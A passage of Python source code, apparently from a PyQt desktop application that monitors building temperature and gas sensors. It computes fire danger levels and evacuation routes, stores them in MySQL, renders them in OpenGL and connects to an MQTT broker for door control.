self.sensor_data[183][0].append([timestamp_value, heat_value, status_value])\n # 504\n elif source_key_prefix == \"8e05\":\n memory_map[184] = 1\n self.sensor_data[184][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"793d\":\n memory_map[185] = 1\n self.sensor_data[185][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"977f\":\n memory_map[186] = 1\n self.sensor_data[186][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"a3cf\":\n memory_map[187] = 1\n self.sensor_data[187][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"d815\":\n memory_map[188] = 1\n self.sensor_data[188][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f855\":\n memory_map[189] = 1\n self.sensor_data[189][0].append([timestamp_value, heat_value, status_value])\n # 505\n elif source_key_prefix == \"7611\":\n memory_map[190] = 1\n self.sensor_data[190][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"96ec\":\n memory_map[191] = 1\n self.sensor_data[191][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"4abc\":\n 
memory_map[192] = 1\n self.sensor_data[192][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"7882\":\n memory_map[193] = 1\n self.sensor_data[193][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"612f\":\n memory_map[194] = 1\n self.sensor_data[194][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"7773\":\n memory_map[195] = 1\n self.sensor_data[195][0].append([timestamp_value, heat_value, status_value])\n # 506\n elif source_key_prefix == \"6a0c\":\n memory_map[196] = 1\n self.sensor_data[196][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"11c5\":\n memory_map[197] = 1\n self.sensor_data[197][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"9469\":\n memory_map[198] = 1\n self.sensor_data[198][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"3437\":\n memory_map[199] = 1\n self.sensor_data[199][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"fc31\": # g\n memory_map[200] = 1\n self.sensor_data[200][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"4051\": # g\n memory_map[201] = 1\n self.sensor_data[201][0].append([timestamp_value, heat_value, status_value])\n # 202 = gas\n # 507 , 연기 추가\n # 203~ 209\n elif source_key_prefix == \"1d69\": # 5층 앞복도\n memory_map[203] = 1\n self.sensor_data[203][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"3181\": # 5 층 복도\n memory_map[204] = 1\n self.sensor_data[204][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"9dc3\": # EV홀\n memory_map[205] = 1\n self.sensor_data[205][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f118\": # 5층 앞복도\n memory_map[206] = 1\n self.sensor_data[206][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"2db9\": # 5층 계단\n memory_map[207] = 1\n self.sensor_data[207][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"5d26\": # EV\n memory_map[208] = 1\n self.sensor_data[208][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f4a0\": # 6층 계단\n memory_map[209] = 1\n self.sensor_data[209][0].append([timestamp_value, heat_value, status_value])\n\n # print(\"Source Key Prefix:\", source_key_prefix)\n # print(\"Timestamp Value:\", timestamp_value)\n # print(\"Heat Value:\", heat_value)\n # print(\"Status Value:\", status_value)\n\nclass db_thread(QThread):\n data_sig = pyqtSignal(object)\n end_sig = pyqtSignal(object)\n\n def __init__(self, shared_data):\n super().__init__()\n\n self.shared_data = shared_data\n\n self.head = [[], [], [], [], [], []]\n self.floor_idx_list = [[], [], [], [], [], []]\n self.temp_index = [[], [], [], [], [], []]\n self.gas_index = [[], [], [], [], [], []]\n\n self.IP = None\n self.Port = None\n self.ID = None\n self.PW = None\n self.DB_Name = None\n\n self.working = False\n self.connection = False\n self.db_connection = None\n self.speed = 1\n self.sensor_stack = 30\n self.floor_num = 4\n\n self.cur = None\n\n self.var_init()\n\n def var_init(self):\n idx_1F = [i for i in range(1, 12)]\n idx_2F = [i for i in range(12, 61)]\n idx_3F = [i for i in range(61, 110)]\n idx_4F = [i for i in range(110, 159)]\n idx_5F = [i for i in range(159, 208)]\n idx_6F = [i for i in range(208, 210)]\n self.floor_idx_list = [idx_1F, 
idx_2F, idx_3F, idx_4F, idx_5F, idx_6F]\n\n def init_DB(self):\n\n try:\n sql = 'CREATE DATABASE IF NOT EXISTS ' + self.DB_Name\n self.cur.execute(sql)\n except Exception as e:\n print(e)\n\n time.sleep(1)\n\n create_danger_level = \"CREATE TABLE IF NOT EXISTS danger_level(time SMALLINT(3) NOT NULL, `101` FLOAT default 0.0, `102` FLOAT default 0.0, `1-1` FLOAT default 0.0, `1-2` FLOAT default 0.0, `1-3` FLOAT default 0.0, \" \\\n \"`201` FLOAT default 0.0, `202` FLOAT default 0.0, `203` FLOAT default 0.0, `204` FLOAT default 0.0, `205` FLOAT default 0.0, `206` FLOAT default 0.0, `207` FLOAT default 0.0, \" \\\n \"`2-1` FLOAT default 0.0, `2-2` FLOAT default 0.0, `2-3` FLOAT default 0.0, `2-4` FLOAT default 0.0, \" \\\n \"`301` FLOAT default 0.0, `302` FLOAT default 0.0, `303` FLOAT default 0.0, `304` FLOAT default 0.0, `305` FLOAT default 0.0, `306` FLOAT default 0.0, `307` FLOAT default 0.0, \" \\\n \"`3-1` FLOAT default 0.0, `3-2` FLOAT default 0.0, `3-3` FLOAT default 0.0, `3-4` FLOAT default 0.0, \" \\\n \"`401` FLOAT default 0.0, `402` FLOAT default 0.0, `403` FLOAT default 0.0, `404` FLOAT default 0.0, `405` FLOAT default 0.0, `406` FLOAT default 0.0, `407` FLOAT default 0.0, \" \\\n \"`4-1` FLOAT default 0.0, `4-2` FLOAT default 0.0, `4-3` FLOAT default 0.0, `4-4` FLOAT default 0.0, \" \\\n \"`501` FLOAT default 0.0, `502` FLOAT default 0.0, `503` FLOAT default 0.0, `504` FLOAT default 0.0, `505` FLOAT default 0.0, `506` FLOAT default 0.0, `507` FLOAT default 0.0, \" \\\n \"`5-1` FLOAT default 0.0, `5-2` FLOAT default 0.0, `5-3` FLOAT default 0.0, `5-4` FLOAT default 0.0, \" \\\n \"PRIMARY KEY(time));\"\n create_exit_route = \"CREATE TABLE IF NOT EXISTS exit_route(time SMALLINT(3) NOT NULL, `101` TINYINT default 0, `102` TINYINT default 0, \" \\\n \"`201` TINYINT default 0, `202` TINYINT default 0, `203` TINYINT default 0, `204` TINYINT default 0, `205` TINYINT default 0, `206` TINYINT default 0, `207` TINYINT default 0, \" \\\n \"`301` TINYINT default 0, `302` TINYINT default 0, `303` TINYINT default 0, `304` TINYINT default 0, `305` TINYINT default 0, `306` TINYINT default 0, `307` TINYINT default 0, \" \\\n \"`401` TINYINT default 0, `402` TINYINT default 0, `403` TINYINT default 0, `404` TINYINT default 0, `405` TINYINT default 0, `406` TINYINT default 0, `407` TINYINT default 0, \" \\\n \"`501` TINYINT default 0, `502` TINYINT default 0, `503` TINYINT default 0, `504` TINYINT default 0, `505` TINYINT default 0, `506` TINYINT default 0, `507` TINYINT default 0, \" \\\n \"PRIMARY KEY(time));\"\n\n try:\n self.cur.execute(create_danger_level)\n except Exception as e:\n print(\"err create_danger_level: \", e)\n try:\n self.cur.execute(create_exit_route)\n except Exception as e:\n print(\"err create_exit_route: \", e)\n\n truccate_danger_level_sql = 'TRUNCATE TABLE danger_level;'\n truccate_exit_rout_sql = 'TRUNCATE TABLE exit_route;'\n try:\n self.cur.execute(truccate_danger_level_sql)\n except Exception as e:\n print(\"err truccate_danger_level_sql: \", e)\n try:\n self.cur.execute(truccate_exit_rout_sql)\n except Exception as e:\n print(\"err truccate_exit_rout_sql: \", e)\n\n danger_level_value = \"\"\n for _ in range(49):\n danger_level_value += \"0.0, \"\n danger_level_value = danger_level_value[:-2]\n\n insert_danger_level_1 = \"INSERT INTO danger_level VALUES\"\n insert_danger_level_2 = \"\"\n for i in range(61):\n insert_danger_level_2 += \"(\" + str(i) + \", \" + danger_level_value + \"), \"\n\n exit_route_value = \"\"\n for _ in range(30):\n exit_route_value += \"0, \"\n 
exit_route_value = exit_route_value[:-2]\n\n insert_exit_route_1 = \"INSERT INTO exit_route VALUES\"\n insert_exit_route_2 = \"\"\n for i in range(61):\n insert_exit_route_2 += \"(\" + str(i) + \", \" + exit_route_value + \"), \"\n\n try:\n self.cur.execute(insert_danger_level_1 + insert_danger_level_2[:-2] + \";\")\n except Exception as e:\n print(\"err insert_danger_level: \", e)\n try:\n self.cur.execute(insert_exit_route_1 + insert_exit_route_2[:-2] + \";\")\n except Exception as e:\n print(\"err insert_exit_route: \", e)\n\n def connect_DB(self):\n if not self.connection:\n try:\n self.db_connection = pymysql.connect(host=self.IP,\n port=int(self.Port),\n user=self.ID,\n password=self.PW,\n db=self.DB_Name,\n charset='utf8',\n autocommit=True,\n read_timeout=5,\n write_timeout=5,\n connect_timeout=5)\n self.cur = self.db_connection.cursor()\n self.init_DB()\n self.connection = True\n except Exception as err:\n print(err)\n else:\n try:\n self.db_connection.close()\n self.connection = False\n except Exception as err:\n print(err)\n\n def disconnect_DB(self):\n if self.connection:\n try:\n self.db_connection.close()\n self.connection = False\n\n except Exception as err:\n print(err)\n\n def list_split_per_floor(self, data, all_index):\n output = []\n for _ in range(len(all_index)):\n output.append([])\n for floor, idx_list in enumerate(all_index):\n for idx in idx_list:\n output[floor].append(data[idx])\n\n return output\n\n def run(self):\n self.connect_DB()\n if self.connection:\n # #region DB_version\n # sql = \"SELECT * FROM sensor_data;\"\n #\n # self.cur.execute(sql)\n # result = self.cur.fetchall()\n # self.disconnect_DB()\n #\n # head = list(result[0]).copy()\n # for idx, type in enumerate(head):\n # this_floor = 0\n # for floor, floor_nodes in enumerate(self.floor_idx_list):\n # if idx in floor_nodes:\n # this_floor = floor\n # if type == 'temp':\n # self.temp_index[this_floor].append(idx)\n # if type == 'gas':\n # self.gas_index[this_floor].append(idx)\n # self.head = [head[1:12], head[12:61], head[61:110], head[110:159], head[159:208], head[208:210]]\n #\n # total_datas = []\n #\n # for _ in range(self.sensor_stack):\n # frame_datas = [result[1][1:12], result[1][12:61], result[1][61:110], result[1][110:159],\n # result[1][159:208], result[1][208:210]]\n # total_datas.append([time.time()] + frame_datas)\n #\n # for data in result[1:]:\n # data = list(data)\n # if self.working:\n # frame_datas = [data[1:12], data[12:61], data[61:110], data[110:159], data[159:208], data[208:210]]\n # total_datas.pop(0)\n # total_datas.append([time.time()] + frame_datas)\n # self.data_sig.emit(total_datas)\n # time.sleep(self.speed / 1)\n # else:\n # break\n # endregion\n\n #reguin kafka_version\n data_str = \"0000 temp temp gas temp temp temp gas temp gas temp gas temp temp temp temp gas gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas gas gas gas gas gas gas temp temp temp temp gas gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas gas gas gas gas gas gas temp temp temp temp gas gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas gas gas gas gas gas gas temp temp temp temp gas gas gas temp temp temp temp gas gas temp temp 
temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas gas gas gas gas gas gas gas gas\"\n head = data_str.split()\n for idx, type in enumerate(head):\n this_floor = 0\n for floor, floor_nodes in enumerate(self.floor_idx_list):\n if idx in floor_nodes:\n this_floor = floor\n break\n if type == 'temp':\n self.temp_index[this_floor].append(idx)\n if type == 'gas':\n self.gas_index[this_floor].append(idx)\n self.head = [head[1:12], head[12:61], head[61:110], head[110:159], head[159:208], head[208:210]]\n\n total_datas = []\n mm_check = False\n while True:\n time.sleep(1)\n mm_check = self.shared_data.get_mm_check()\n if mm_check:\n result = self.shared_data.get_a()\n for i in range(210):\n result[i] = float(result[i])\n frame_datas = [result[1:12], result[12:61], result[61:110], result[110:159], result[159:208],\n result[208:210]]\n if len(total_datas) == 0:\n for _ in range(29):\n total_datas.append([time.time()] + frame_datas)\n elif len(total_datas) == 30:\n total_datas.pop(0)\n total_datas.append([time.time()] + frame_datas)\n\n if len(total_datas) == 30:\n if self.working:\n self.data_sig.emit(total_datas)\n\n\n else:\n print(len(total_datas), end='...')\n if (len(total_datas) == 29):\n print()\n self.end_sig.emit(True)\n self.quit()\n self.wait(2000)\n\n self.working = False\n #endregion\n\n\n\n\n\n\n\nclass get_data:\n\n def __init__(self, ui):\n super().__init__()\n self.ui = ui\n self.pd = None\n self.bg = None\n self.ad = None\n self.db_worker = None\n self.kafka_worker = None\n self.wc = None\n\n self.IP = None\n self.Port = None\n self.ID = None\n self.PW = None\n self.DB_Name = None\n\n self.last_exit_rout = []\n self.last_danger_level = []\n\n self.func_init()\n self.var_init()\n self.event_init()\n\n self.client = None\n self.mqtt_host = \"182.229.102.253\"# 원익 서버 주소\n self.mqtt_port = 1883\n self.sub_result = 10\n self.last_pub_time = time.time()\n\n self.mqtt_connection()\n\n def func_init(self):\n self.pd = plot_data(self.ui)\n self.bg = build_gl(self.ui.openGLWidget)\n self.bg.ui_init(self.ui)\n self.ad = analy_data(self.ui)\n self.wc = weight_checker()\n\n self.shared_data = SharedData()\n\n def var_init(self):\n # if use DB\n self.db_worker = db_thread(self.shared_data)\n\n #if use kafka\n self.kafka_worker = kafka_thread(self.shared_data)\n self.kafka_worker.start()\n\n self.set_default_param()\n\n def on_connect(self, client, userdata, flags, rc):\n if rc == 0:\n print(\"connected OK\")\n else:\n print(\"connected error\")\n\n def on_disconnect(self, cliecnt, userdata, flags, rc=0):\n if rc == 0:\n print(\"disconnected OK\")\n else:\n print(\"disconnected error\")\n\n def on_subscribe(self, client, userdata, mid, granted_qos):\n print(\"subscribe OK\")\n\n def on_message(self, client, userdata, msg):\n self.sub_doorOpenCall(msg)\n\n def mqtt_connection(self):\n try:\n self.client = mqtt.Client()\n self.client.on_connect = self.on_connect\n self.client.on_disconnect = self.on_disconnect\n self.client.on_subscribe = self.on_subscribe\n self.client.on_message = self.on_message\n\n self.client.connect(self.mqtt_host, self.mqtt_port)\n self.client.loop_start()\n self.client.subscribe(topic='/front/door/robot/fire/#', qos=1)\n except Exception as e:\n print(\"first MQTT connection error: \", str(e))\n\n def pub_doorOpenCall(self):\n topic = \"/front/door/robot/\" + \"fire\" + \"/door/open\"\n pub_data = json.dumps({\"id\": 0,\n \"block\": 0,\n \"building\": 0,\n \"unit\": 0,\n \"floor\": \"0\",\n 
\"type\": 0,\n })\n return topic, pub_data\n\n def sub_doorOpenCall(self, msg):\n sub_msg = json.loads(str(msg.payload.decode(\"utf-8\")))\n print(\"door open response (door -> AI)\")\n self.sub_result = sub_msg.get(\"result\")\n sub_result = self.sub_result\n return sub_result\n\n def resizeWidget(self):\n self.bg.resizeWidget(self.ui.openGLWidget.geometry())\n width = self.ui.log_tabWidget.geometry().width() - 6\n height = self.ui.log_tabWidget.geometry().height() - 25\n self.ui.system_log_table.setGeometry(QRect((width / 2.0) * 0.0, 0, width / 2.0 - 1, height))\n self.ui.analysis_log_table.setGeometry(QRect((width / 2.0) * 1.0, 0, width / 2.0 - 1, height))\n # self.ui.react_log_table.setGeometry(QRect((width / 2.0) * 2.0, 0, width / 2.0 - 1, height))\n self.ui.temp_data_log_table.setGeometry(QRect(0, 0, width, height))\n self.ui.gas_data_log_table.setGeometry(QRect(0, 0, width, height))\n\n def set_default_param(self):\n self.IP = self.ui.IP_Edit.text()\n self.Port = self.ui.PORT_Edit.text()\n self.ID = self.ui.ID_Edit.text()\n self.PW = self.ui.PW_Edit.text()\n self.DB_Name = self.ui.DBName_Edit.text()\n self.db_worker.IP = self.IP\n self.db_worker.Port = self.Port\n self.db_worker.ID = self.ID\n self.db_worker.PW = self.PW\n self.db_worker.DB_Name = self.DB_Name\n\n self.last_danger_level = []\n self.last_exit_rout = []\n for _ in range(61):\n default_danger_level = [[], [], [], [], []]\n default_exit_route = {}\n for floor in range(5):\n if floor == 0:\n for room in range(2):\n default_exit_route[str(floor + 1) + '0' + str(room + 1)] = 0\n for node in range(5):\n default_danger_level[floor].append(0.0)\n\n else:\n for room in range(7):\n default_exit_route[str(floor + 1) + '0' + str(room + 1)] = 0\n for node in range(11):\n default_danger_level[floor].append(0.0)\n self.last_danger_level.append(default_danger_level)\n self.last_exit_rout.append(default_exit_route)\n\n for floor in range(4):\n self.bg.scenario_data[floor]['index'] = -1\n self.bg.scenario_data[floor]['start_time'] = None\n self.bg.scenario_data[floor]['diff'] = -1\n self.bg.scenario_data[floor]['data'] = {}\n\n def event_init(self):\n self.db_worker.data_sig.connect(self.data_analy)\n self.db_worker.end_sig.connect(self.thread_end)\n\n def worker_start(self):\n if self.db_worker.isRunning():\n self.db_worker.working = False\n # self.db_worker.stop()\n else:\n self.set_default_param()\n self.db_worker.working = True\n self.db_worker.start()\n self.thread_event_set_ui()\n\n def thread_event_set_ui(self):\n if self.db_worker.working == True:\n self.ui.Start_Service_btn.setText(\"STOP\")\n self.system_log(\"TCP start\")\n if self.db_worker.working == False:\n self.ui.Start_Service_btn.setText(\"START\")\n self.system_log(\"TCP End\")\n\n def split_datas_sensor_type(self, head, datas):\n total_temp_datas = []\n total_gas_datas = []\n for data in datas:\n temp_datas = [[], [], [], [], [], []]\n gas_datas = [[], [], [], [], [], []]\n for floor, (types, values) in enumerate(zip(head, data[1:])):\n for type, value in zip(types, values):\n if type == 'temp':\n temp_datas[floor].append(value)\n elif type == 'gas':\n gas_datas[floor].append(float(value)*0.01)\n total_temp_datas.append([data[0]] + temp_datas)\n total_gas_datas.append([data[0]] + gas_datas)\n return total_temp_datas, total_gas_datas\n\n\n\n\n def update_danger_level_DB(self, time, danger_level):\n danger_level_sql = 'UPDATE danger_level SET '\n for floor, floor_danger_level in enumerate(danger_level):\n floor += 1\n for node, node_danger_level in 
enumerate(floor_danger_level):\n node += 1\n if floor == 1:\n if node <= 2:\n danger_level_sql += ('`' + str(floor) + '0' + str(node) + '` = ' + \"{:.1f}\".format(\n node_danger_level) + ', ')\n else:\n danger_level_sql += ('`' + str(floor) + '-' + str(node - 2) + '` = ' + \"{:.1f}\".format(\n node_danger_level) + ', ')\n else:\n if node <= 7:\n danger_level_sql += ('`' + str(floor) + '0' + str(node) + '` = ' + \"{:.1f}\".format(\n node_danger_level) + ', ')\n else:\n danger_level_sql += ('`' + str(floor) + '-' + str(node - 7) + '` = ' + \"{:.1f}\".format(\n node_danger_level) + ', ')\n\n danger_level_sql = danger_level_sql[:-2] + ' WHERE time = ' + str(time) + ';'\n try:\n with pymysql.connect(host=self.IP, port=int(self.Port), user=self.ID, password=self.PW, db=self.DB_Name,\n charset='utf8', autocommit=True, read_timeout=5, write_timeout=5,\n connect_timeout=5) as conn:\n with conn.cursor() as cur:\n cur.execute(danger_level_sql)\n except Exception as e:\n print(e)\n\n def update_exit_rout_DB(self, time, exit_routes):\n exit_route_sql = 'UPDATE exit_route SET '\n for room in exit_routes.keys():\n exit_route_sql += ('`' + room + '` = ' + str(exit_routes[room]) + ', ')\n exit_route_sql = exit_route_sql[:-2] + ' WHERE time = ' + str(time) + ';'\n\n try:\n with pymysql.connect(host=self.IP, port=int(self.Port), user=self.ID, password=self.PW, db=self.DB_Name,\n charset='utf8', autocommit=True, read_timeout=5, write_timeout=5,\n connect_timeout=5) as conn:\n with conn.cursor() as cur:\n cur.execute(exit_route_sql)\n except Exception as e:\n print(e)\n\n def check_danger_level_changed(self, last_data, new_data):\n output = False\n for last_floor_data, new_floor_data in zip(last_data, new_data):\n for last_value, new_value in zip(last_floor_data, new_floor_data):\n if last_value != new_value:\n output = True\n return output\n\n def check_exit_route_changed(self, last_data, new_data):\n output = False\n\n for key in new_data.keys():\n if last_data[key] != new_data[key]:\n output = True\n\n return output\n\n def check_scenario_changed(self, last_data, new_data):\n output = False\n\n for floor, (last_index, new_index) in enumerate(zip(last_data, new_data)):\n if last_index != new_index:\n self.bg.scenario_data[floor]['index'] = new_data[floor]\n self.bg.load_scenario(floor)\n output = True\n\n return output\n\n def search_all_eixt_route(self, weight, watching=None):\n exit_routs = {}\n for floor in range(5):\n if floor == 0:\n for room in range(2):\n start_node = 'room' + str(floor) + str(room)\n path_route = self.bg.eva_draw.rs.search(weight, start_node)\n if path_route[-1] == 'escape00':\n exit_routs[str(floor + 1) + '0' + str(room + 1)] = 0\n elif path_route[-1] == 'escape01':\n exit_routs[str(floor + 1) + '0' + str(room + 1)] = 1\n\n if watching != None:\n if start_node == watching:\n self.bg.eva_draw.path_route = path_route\n else:\n for room in range(7):\n start_node = 'room' + str(floor) + str(room)\n path_route = self.bg.eva_draw.rs.search(weight, start_node)\n if path_route[-1] == 'escape00':\n exit_routs[str(floor + 1) + '0' + str(room + 1)] = 0\n elif path_route[-1] == 'escape01':\n exit_routs[str(floor + 1) + '0' + str(room + 1)] = 1\n\n if watching != None:\n if start_node == watching:\n self.bg.eva_draw.path_route = path_route\n return exit_routs\n\n def data_analy(self, total_datas):\n try:\n #region get data\n temp_datas, gas_datas = self.split_datas_sensor_type(self.db_worker.head, total_datas)\n #endregion\n\n #region check Fire\n Fire_status, temp_idx, gas_idx = 
self.ad.check_danger(temp_datas, gas_datas)\n\n\n for floor, last, new in zip(range(5), self.bg.eva_draw.Fire, Fire_status):\n if (not last) and (new):\n if (floor >= 1) and (floor <= 4):\n self.bg.scenario_data[floor - 1]['start_time'] = int(time.time())\n min_time = time.time()\n for dif_floor in range(4):\n if (floor - 1) != dif_floor:\n if self.bg.scenario_data[dif_floor]['start_time'] is not None:\n if (self.bg.scenario_data[dif_floor]['start_time'] - min_time) <= 0:\n min_time = self.bg.scenario_data[dif_floor]['start_time']\n for dif_floor in range(4):\n if self.bg.scenario_data[dif_floor]['start_time'] is not None:\n self.bg.scenario_data[dif_floor]['diff'] = int(int(self.bg.scenario_data[dif_floor]['start_time'] - min_time) / 60.0)\n self.bg.eva_draw.Fire = Fire_status\n #endregion\n\n\n watching_node = None\n if self.bg.Watch_Present:\n watching_node = 'room' + str(self.bg.eva_draw.Start_floor) + str(self.bg.eva_draw.Start_room)\n\n # region real time DB Update\n real_time = 0\n danger_level = []\n for floor in range(6):\n danger_level.append(self.bg.set_danger_level_Sensor(floor, self.db_worker.head[floor], total_datas[-1][floor + 1], self.bg.Watch_Present))\n\n\n danger_level_change = self.check_danger_level_changed(self.last_danger_level[real_time], danger_level)\n\n if danger_level_change:\n self.last_danger_level[real_time] = danger_level\n self.update_danger_level_DB(real_time, danger_level)\n\n self.wc.set_node_weight_useSensor(temp_idx, gas_idx, self.db_worker.temp_index, self.db_worker.gas_index)\n exit_routs = self.search_all_eixt_route(self.wc.node, watching_node)\n\n exit_rout_change = self.check_exit_route_changed(self.last_exit_rout[real_time], exit_routs)\n if exit_rout_change:\n self.last_exit_rout[real_time] = exit_routs\n self.update_exit_rout_DB(real_time, exit_routs)\n\n\n # endregion\n\n if True in self.bg.eva_draw.Fire:\n\n # current_time = time.time()\n # if self.sub_result == 0:\n # if current_time - self.last_pub_time >= 60:\n # topic, pub_data = self.pub_doorOpenCall()\n # self.client.publish(topic, pub_data)\n # self.last_pub_time = current_time # pub한 시간을 갱신\n # else:\n # print(\"already\")\n # else:\n # topic, pub_data = self.pub_doorOpenCall()\n # self.client.publish(topic, pub_data)\n # ��동문 제어 end\n\n\n scenario_idx = self.ad.check_scenario(self.bg.eva_draw.Fire, temp_datas, gas_datas)\n change_scenario = self.check_scenario_changed([floor_data['index'] for floor_data in self.bg.scenario_data], scenario_idx)\n\n # region future DB Update\n\n floor_idx = [[0, 47], [47, 94], [94, 141], [141, 188]]\n if change_scenario:\n for minute in range(1, 61):\n layer_height_data = [3.0 for _ in range(188)]\n watching_node = None\n set = False\n if not self.bg.Watch_Present:\n if minute == self.bg.time_gap:\n watching_node = 'room' + str(self.bg.eva_draw.Start_floor) + str(self.bg.eva_draw.Start_room)\n set = True\n\n danger_level = []\n for floor in range(5):\n data = []\n if floor != 0:\n if self.bg.scenario_data[floor - 1]['index'] != -1:\n search_time = minute - self.bg.scenario_data[floor - 1]['diff'] + 1\n if search_time >= 60:\n search_time = 60\n elif search_time <= 1:\n search_time = 1\n data = self.bg.scenario_data[floor - 1]['data'][str(search_time)]\n layer_height_data[floor_idx[floor - 1][0]:floor_idx[floor - 1][1]] = data\n danger_level.append(self.bg.set_danger_level_Layerheight(floor, data, set))\n\n danger_level_change = self.check_danger_level_changed(self.last_danger_level[minute], danger_level)\n if danger_level_change:\n 
self.last_danger_level[minute] = danger_level\n self.update_danger_level_DB(minute, danger_level)\n\n self.wc.set_node_weight_useLayerheight(layer_height_data)\n exit_routs = self.search_all_eixt_route(self.wc.node, watching_node)\n exit_rout_change = self.check_exit_route_changed(self.last_exit_rout[minute], exit_routs)\n if exit_rout_change:\n self.last_exit_rout[minute] = exit_routs\n self.update_exit_rout_DB(minute, exit_routs)\n\n else: # not change scenario\n if not self.bg.Watch_Present:\n layer_height_data = [3.0 for _ in range(188)]\n set = True\n watching_node = 'room' + str(self.bg.eva_draw.Start_floor) + str(self.bg.eva_draw.Start_room)\n\n for floor in range(5):\n data = []\n if floor != 0:\n if self.bg.scenario_data[floor - 1]['index'] != -1:\n search_time = self.bg.time_gap - self.bg.scenario_data[floor - 1]['diff'] + 1\n if search_time >= 60:\n search_time = 60\n elif search_time <= 1:\n search_time = 1\n data = self.bg.scenario_data[floor - 1]['data'][str(search_time)]\n layer_height_data[floor_idx[floor - 1][0]:floor_idx[floor - 1][1]] = data\n self.bg.set_danger_level_Layerheight(floor, data, set)\n self.wc.set_node_weight_useLayerheight(layer_height_data)\n self.search_all_eixt_route(self.wc.node, watching_node)\n\n #endregion\n\n\n else:\n self.bg.eva_draw.Fire = [False for _ in range(5)]\n self.bg.gl_draw.show_route = False\n self.bg.eva_draw.path_route = None\n\n if self.bg.Watch_Mode == 0:\n if True in self.bg.eva_draw.Fire:\n if self.ui.WatchMode_Highlight.isChecked():\n for floor in range(6):\n if floor == self.bg.eva_draw.Start_floor:\n self.bg.gl_draw.Transparency[floor] = 1.0\n else:\n self.bg.gl_draw.Transparency[floor] = 0.1\n else:\n for floor in range(6):\n self.bg.gl_draw.Transparency[floor] = 1.0\n else:\n for floor in range(6):\n self.bg.gl_draw.Transparency[floor] = 1.0\n\n self.pd.data_plot(temp_datas, gas_datas)\n self.data_log(temp_datas[-1], gas_datas[-1])\n\n except Exception as e:\n print(e)\n\n def change_Watch_Mode(self):\n if self.ui.WatchMode0.isChecked():\n self.bg.Watch_Mode = 0\n self.ui.WatchFloor_comboBox.setEnabled(False)\n\n if True in self.bg.eva_draw.Fire:\n if self.ui.WatchMode_Highlight.isChecked():\n for floor in range(6):\n if floor == self.bg.eva_draw.Start_floor:\n self.bg.gl_draw.Transparency[floor] = 1.0\n else:\n self.bg.gl_draw.Transparency[floor] = 0.1\n else:\n for floor in range(6):\n self.bg.gl_draw.Transparency[floor] = 1.0\n else:\n for floor in range(6):\n self.bg.gl_draw.Transparency[floor] = 1.0\n elif self.ui.WatchMode1.isChecked():\n self.bg.Watch_Mode = 1\n self.ui.WatchFloor_comboBox.setEnabled(True)\n for floor in range(6):\n self.bg.gl_draw.Transparency[floor] = 1.0\n elif self.ui.WatchMode2.isChecked():\n self.bg.Watch_Mode = 2\n self.ui.WatchFloor_comboBox.setEnabled(True)\n for floor in range(6):\n self.bg.gl_draw.Transparency[floor] = 1.0\n\n self.bg.trans_pos_x, self.bg.trans_pos_y, self.bg.trans_pos_z = (0, 0, 0)\n self.bg.x_angle, self.bg.z_angle = 1, 1\n\n # camera\n self.bg.last_pos_x, self.bg.last_pos_y, self.bg.last_pos_z = 0.0, 5.0, -5.0\n\n # object move\n self.bg.move_last_pos_x, self.bg.move_last_pos_y, self.bg.move_last_pos_z = 0.0, 0.0, 0.0\n self.bg.trans_pos_x, self.bg.trans_pos_y, self.bg.trans_pos_z = 0, 0, 0\n\n def change_Start_Floor(self):\n self.bg.eva_draw.Start_floor = self.ui.StartFloor_comboBox.currentIndex()\n if self.bg.eva_draw.Start_floor == 0:\n self.ui.StartRoom_comboBox.clear()\n for i in range(2):\n self.ui.StartRoom_comboBox.addItem(str(i + 1))\n else:\n 
self.ui.StartRoom_comboBox.clear()\n for i in range(7):\n self.ui.StartRoom_comboBox.addItem(str(i + 1))\n self.bg.eva_draw.Start_room = 0\n\n def change_Start_Room(self):\n if self.ui.StartRoom_comboBox.currentIndex() >= 0:\n self.bg.eva_draw.Start_room = self.ui.StartRoom_comboBox.currentIndex()\n\n def change_Watch_Floor(self):\n self.bg.gl_draw.Watch_floor = self.ui.WatchFloor_comboBox.currentIndex()\n self.bg.eva_draw.Watch_floor = self.bg.gl_draw.Watch_floor\n self.bg.gl_draw.Transparency[self.bg.gl_draw.Watch_floor] = 1.0\n\n def change_N_Mode(self):\n if self.ui.watch_present.isChecked():\n self.bg.Watch_Present = True\n self.ui.N_min_later_combobox.setEnabled(False)\n else:\n self.ui.N_min_later_combobox.setEnabled(True)\n self.bg.Watch_Present = False\n self.ui.N_min_later_combobox.setCurrentIndex(0)\n self.bg.time_gap = self.ui.N_min_later_combobox.currentIndex()\n\n def change_N_min(self):\n self.bg.time_gap = self.ui.N_min_later_combobox.currentIndex()\n\n def thread_end(self, object):\n self.thread_event_set_ui()\n\n def system_log(self, log):\n\n time_str = 